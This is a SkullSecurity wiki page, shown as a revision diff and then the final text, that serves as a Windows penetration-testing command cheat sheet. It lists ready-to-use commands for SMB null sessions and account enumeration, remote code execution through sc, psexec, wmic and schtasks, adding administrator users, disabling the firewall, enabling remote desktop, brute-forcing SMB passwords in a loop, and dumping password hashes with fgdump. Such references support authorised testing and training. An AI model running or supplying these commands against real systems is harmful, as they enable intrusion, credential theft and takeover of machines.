Difference between revisions of "Windows Commands"

From SkullSecurity
Jump to navigation Jump to search
 
(19 intermediate revisions by one other user not shown)
Line 17: Line 17:
<pre>&gt; set norecurse
<pre>&gt; set norecurse
&gt; set recurse</pre>
&gt; set recurse</pre>
==Scanning==
===tracert===
Parameters
* -d -- don't resolve names
* -h &lt;N&gt; -- max number of hops (default 30)
* -j &lt;hostlist&gt; -- use loose source routing
* -w &lt;N&gt; -- wait for Nms before timing out (default 4000)
===SMB session===
Establishing a null session
<pre>net use \\&lt;target&gt; "" /u:""</pre>
Establishing an authenticated session
<pre>net use \\&lt;target&gt; &lt;password&gt; /u:&lt;username&gt;</pre>
Mount a share
<pre>net use * \\&lt;target&gt;\&lt;share&gt; &lt;password&gt; /u:&lt;username&gt;
net use * \\&lt;target&gt;\&lt;share&gt; &lt;password&gt; /u:&lt;machinename&gt;\&lt;username&gt;
net use * \\&lt;target&gt;\c$ &lt;password&gt; /u:&lt;username&gt;</pre>
Dropping SMB sessions
<pre>net use \\&lt;target&gt; /del</pre>
Dropping all SMB sessions (bad idea)
<pre>net use * /del</pre>
===Pulling credentials (w/ SMB session)===
Pulling credentials
<pre>enum -U &lt;target&gt;
enum -G &lt;target&gt;</pre>
user2sid
* Outputs in the form S-X-Y-target_sid-RID
<pre>user2sid \\&lt;target&gt; &lt;machine_name&gt;</pre>
sid2user
* Requires spaces instead of dashes
<pre>sid2user \\&lt;target&gt; 5 &lt;target_sid&gt; &lt;N&gt;</pre>
<pre>for /L %i in (1000, 1, 1050) do @sid2user \\&lt;target&gt; 5 &lt;target_sid&gt; %i</pre>
==Exploitation==
===Finding client-side programs===
<pre>dir /s "c:\Program Files"</pre>
<pre>dir /s /b "c:\Program Files\*.exe"</pre>
===Service interaction===
List running services
<pre>sc query</pre>
List all services
<pre>sc query state= all</pre>
List all service names
<pre>sc query state= all | find "SERVICE_NAME"</pre>
Query service information
<pre>sc query &lt;servicename&gt;
sc qc &lt;servicename&gt;</pre>
Start a service
<pre>sc config &lt;servicename&gt; start= demand
sc start &lt;servicename&gt;</pre>
Starting telnet
<pre>sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr</pre>
Starting terminal services
<pre>sc query termservice
sc config termservice start= demand
sc start termservice</pre>
Using sc to invoke an executable
<pre>net use \\&lt;target&gt; &lt;password&gt; /u:&lt;username&gt;
sc \\&lt;target&gt; create &lt;name&gt; binpath= &lt;command&gt;
sc \\&lt;target&gt; start &lt;name&gt;</pre>
Making that service invoke another executable
<pre>sc \\&lt;target&gt; &lt;name&gt; create binpath= "cmd.exe /k &lt;command&gt;"</pre>
===Variables===
Finding environmental variables
<pre>set</pre>
Finding a specific variable
<pre>set &lt;variable&gt;
echo %&lt;variable&gt;%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.</pre>
===Users and groups===
Listing users
<pre>net user</pre>
Creating a user
<pre>net user &lt;username&gt; &lt;password&gt; /add</pre>
Listing groups
<pre>net localgroup</pre>
Creating a group
<pre>net localgroup &lt;groupname&gt; /add</pre>
Adding a user to a group
<pre>net localgroup &lt;groupname&gt; &lt;username&gt; /add</pre>
Adding a user to the telnet users group
<pre>net user &lt;username&gt; &lt;password&gt; /add
net localgroup TelnetClients /add
net localgroup TelnetClients &lt;username&gt; /add</pre>
Adding a user to the terminal services group
<pre>net localgroup "Remote Desktop Users" &lt;username&gt; /add</pre>
List administrators
<pre>net localgroup administrators</pre>
Add an administrator
<pre>net user &lt;username&gt; %lt;password&gt; /add
net localgroup administrators &lt;username&gt; /add</pre>
Remove a user from a group
<pre>net localgroup &lt;group&gt; &lt;username&gt; /del</pre>
Delete a user
<pre>net user &lt;username&gt; /del</pre>
===Firewall interaction===
Help
<pre>netsh /?</pre>
Show config
<pre>netsh firewall show config</pre>
Open a specific port
<pre>netsh firewall add portopening protocol = &lt;TCP|UDP&gt; port = &lt;port&gt; name = &lt;comment&gt; scope = custom addresses = &lt;address/CIDR&gt;</pre>
Remove the port opening
<pre>netsh firewall del portopening protocol = &lt;TCP|UDP&gt; port = &lt;port&gt;</pre>
Disable the firewall completely (bad idea)
<pre>netsh firewall set opmode disable</pre>
Opening the firewall for telnet
<pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = &lt;address&gt;</pre>
Opening the firewall for terminal services
<pre>netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = &lt;address&gt;</pre>
Opening the firewall for SSH
<pre>netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = &lt;address&gt;</pre>
===Registry interaction===
Query a key
<pre>reg query &lt;keyname&gt;</pre>
Adding a key
<pre>reg add &lt;keyname&gt; /v &lt;valuename&gt; /t &lt;type&gt; /d &lt;data&gt;</pre>
Export data
<pre>reg export &lt;keyname&gt; &lt;filename.reg&gt;</pre>
Import data
<pre>reg import &lt;filename.reg&gt;</pre>
Enabling terminal services
<pre>reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0</pre>
===netstat===
Finding a port
<pre>netstat -an | find "&lt;port&gt;"</pre>
===ipconfig===
Dump the DNS cache
<pre>ipconfig /displaydns</pre>
===arp===
Dump the ARP cache
<pre>arp -a</pre>
===Looping===
/L loop
<pre>for /L %i in (&lt;start&gt;,&lt;step&gt;,&lt;stop&gt;) do &lt;command&gt;</pre>
Counting
<pre>for /L %i in (1,1,255) do @echo %i</pre>
Ping scanning
<pre>for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"</pre>
DNS bruteforce
<pre>for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i</pre>
/F loop
<pre>for /F ["&lt;options&gt;"] %i in (&lt;stuff&gt;) do &lt;command&gt;</pre>
Looping through passwords
<pre>for /F %i in (password.lst) do @echo %i & @net use \\&lt;target&gt; %i /u:&lt;username&gt; 2>nul && pause</pre>
Portscanning from a file
<pre>for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i</pre>
===psexec===
Using psexec (sysinternals)
* -s to run as system
* -c to copy the program to the target first
* -d to run in "detached" mode (no console)
<pre>psexec \\&lt;target&gt; -d -u &lt;user&gt; -p &lt;password&gt; &lt;command&gt;</pre>
===at/schtasks===
Starting the scheduler service
<pre>net use \\&lt;target&gt; &lt;password&gt; &lt;username&gt;
sc [\\&lt;target&gt;] query schedule
sc [\\&lt;target&gt;] start schedule</pre>
Scheduling with at:
<pre>at [\\&lt;target&gt;] &lt;HH:MM&gt;&lt;A|P&gt; &lt;command&gt;</pre>
Scheduling with schtasks
<pre>schtasks /create /tn &lt;taskname&gt; /s &lt;target&gt; /u &lt;user&gt; /p &lt;password&gt; /sc &lt;frequency&gt; /st &lt;starttime&gt; /sd &lt;startdate&gt; /tr &lt;command&gt;</pre>
===wmic===
Running a program
<pre>wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process call create &lt;command&gt;</pre>
List processes
<pre>wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process list brief</pre>
<pre>wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process where processid="&lt;pid&gt;" delete</pre>
<pre>wmic /node:&lt;target&gt; /user:&lt;username&gt; /password:&lt;password&gt; process where name="&lt;name&gt;" delete</pre>
==Passwords==
===Account lockout===
Info on Windows accounts
<pre>net accounts
net accounts /domain</pre>
===fgdump===
Options
* -c -- don't get cached credentials
* -h &lt;target&gt;
* -u &lt;username&gt;
<pre>fgdump -c -h &lt;target&gt; -u &lt;username&gt;</pre>
===Pass-the-hash toolkit (psh-toolkit)===
Trend finally noticed/deleted these programs, so I don't have their parameters handy
* whosthere-exe
* genhash.exe
* iam.exe
==Helpful hints==
===ftp===
Download a file as anonymous
<pre>ftp -A -s:ftp-script.txt &lt;host&gt;</pre>
The script
<pre>get &lt;file&gt;
bye</pre>
An even better script, that grabs everything in the base directory
<pre>prompt
mget .
bye
</pre>

Latest revision as of 09:13, 21 January 2011

Recon

nslookup

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
  • Interactive mode:
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
  • No recurse:
> set norecurse
> set recurse

Scanning

tracert

Parameters

  • -d -- don't resolve names
  • -h <N> -- max number of hops (default 30)
  • -j <hostlist> -- use loose source routing
  • -w <N> -- wait for Nms before timing out (default 4000)

SMB session

Establishing a null session

net use \\<target> "" /u:""

Establishing an authenticated session

net use \\<target> <password> /u:<username>

Mount a share

net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>

Dropping SMB sessions

net use \\<target> /del

Dropping all SMB sessions (bad idea)

net use * /del

Pulling credentials (w/ SMB session)

Pulling credentials

enum -U <target>
enum -G <target>

user2sid

  • Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>

sid2user

  • Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i

Exploitation

Finding client-side programs

dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"

Service interaction

List running services

sc query

List all services

sc query state= all

List all service names

sc query state= all | find "SERVICE_NAME"

Query service information

sc query <servicename>
sc qc <servicename>

Start a service

sc config <servicename> start= demand
sc start <servicename>

Starting telnet

sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr

Starting terminal services

sc query termservice
sc config termservice start= demand
sc start termservice

Using sc to invoke an executable

net use \\<target> <password> /u:<username>
sc \\<target> create <name> binpath= <command>
sc \\<target> start <name>

Making that service invoke another executable

sc \\<target> <name> create binpath= "cmd.exe /k <command>"

Variables

Finding environmental variables

set

Finding a specific variable

set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.

Users and groups

Listing users

net user

Creating a user

net user <username> <password> /add

Listing groups

net localgroup

Creating a group

net localgroup <groupname> /add

Adding a user to a group

net localgroup <groupname> <username> /add

Adding a user to the telnet users group

net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add

Adding a user to the terminal services group

net localgroup "Remote Desktop Users" <username> /add

List administrators

net localgroup administrators

Add an administrator

net user <username> %lt;password> /add
net localgroup administrators <username> /add

Remove a user from a group

net localgroup <group> <username> /del

Delete a user

net user <username> /del

Firewall interaction

Help

netsh /?

Show config

netsh firewall show config

Open a specific port

netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>

Remove the port opening

netsh firewall del portopening protocol = <TCP|UDP> port = <port>

Disable the firewall completely (bad idea)

netsh firewall set opmode disable

Opening the firewall for telnet

netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>

Opening the firewall for terminal services

netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>

Opening the firewall for SSH

netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>

Registry interaction

Query a key

reg query <keyname>

Adding a key

reg add <keyname> /v <valuename> /t <type> /d <data>

Export data

reg export <keyname> <filename.reg>

Import data

reg import <filename.reg>

Enabling terminal services

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0

netstat

Finding a port

netstat -an | find "<port>"

ipconfig

Dump the DNS cache

ipconfig /displaydns

arp

Dump the ARP cache

arp -a

Looping

/L loop

for /L %i in (<start>,<step>,<stop>) do <command>

Counting

for /L %i in (1,1,255) do @echo %i

Ping scanning

for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"

DNS bruteforce

for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

/F loop

for /F ["<options>"] %i in (<stuff>) do <command>

Looping through passwords

for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause

Portscanning from a file

for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i

psexec

Using psexec (sysinternals)

  • -s to run as system
  • -c to copy the program to the target first
  • -d to run in "detached" mode (no console)
psexec \\<target> -d -u <user> -p <password> <command>

at/schtasks

Starting the scheduler service

net use \\<target> <password> <username>
sc [\\<target>] query schedule
sc [\\<target>] start schedule

Scheduling with at:

at [\\<target>] <HH:MM><A|P> <command>

Scheduling with schtasks

schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>

wmic

Running a program

wmic /node:<target> /user:<username> /password:<password> process call create <command>

List processes

wmic /node:<target> /user:<username> /password:<password> process list brief
wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete

Passwords

Account lockout

Info on Windows accounts

net accounts
net accounts /domain

fgdump

Options

  • -c -- don't get cached credentials
  • -h <target>
  • -u <username>
fgdump -c -h <target> -u <username>

Pass-the-hash toolkit (psh-toolkit)

Trend finally noticed/deleted these programs, so I don't have their parameters handy

  • whosthere-exe
  • genhash.exe
  • iam.exe

Helpful hints

ftp

Download a file as anonymous

ftp -A -s:ftp-script.txt <host>

The script

get <file>
bye

An even better script, that grabs everything in the base directory

prompt
mget .
bye